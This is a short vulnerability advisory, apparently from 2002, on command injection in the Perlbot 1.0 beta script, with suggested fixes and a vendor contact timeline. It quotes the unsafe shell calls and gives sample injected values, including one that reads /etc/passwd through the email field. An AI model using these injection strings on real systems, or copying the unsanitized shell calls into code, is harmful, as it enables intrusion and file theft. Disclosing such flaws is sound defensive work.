|
|
|
|
| |
| A security vulnerability in Madhater's Perlbot allows remote attackers to cause the product to execute arbitrary code. |
| |
Credit:
The information has been provided by guejez.
|
| |
Vulnerable systems:
* Perlbot version 1.0 beta
1. Due to no input filtering and a call to the shell the script could be used to execute any command it has permission to.
A more detailed explanation:
The script does not limit the characters sent to the shell from user input. The problem is in this line:
foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)
Which allows an attacker to "break out" of the quotes and issue any command they wish by doing something like anything";cmd. Other abuses could be issuing commands with `cmd` and $(cmd) or \xxx where xxx is the octal value of any character. Some form of user input filtering must be used.
2. Due to no input filtering and a bad open() call when the script attempts to send email it is possible to execute commands.
A more detailed explanation:
The script attempts to send an email to the user. It takes the user's email address and passes it to the shell as an argument to the mail program:
open (MAIL,"| $sendmail $recipient") || die $!;
This means things like hacker@scan-associates.net < /etc/passwd could be used as an email address to get any file from the system the script has permission to read. Or command execution is possible with hacker@scan-associates.net ;cmd. In order to prevent this simply take the $recipient value out of the shell call.
Fix:
According to the author a fix could be in a new version of the script. The script's homepage was down at the time of this advisory, so here is the suggested fix. Replace the following line:
my $word=$';
With:
my $word=$';
$word =~ s/[^\w]//g;
And replace the following line:
open (MAIL,"| $sendmail $recipient") || die $!;
With:
open (MAIL,"| $sendmail -t") || die $!;
Vendor Contact:
07-22-02 - guejez emailed myneid@gothcafe.com and alerted him of this vulnerability.
07-22-02 - guejez received email confirming vulnerabilities and stating fixes could be in new version.
|
|
|
|
|
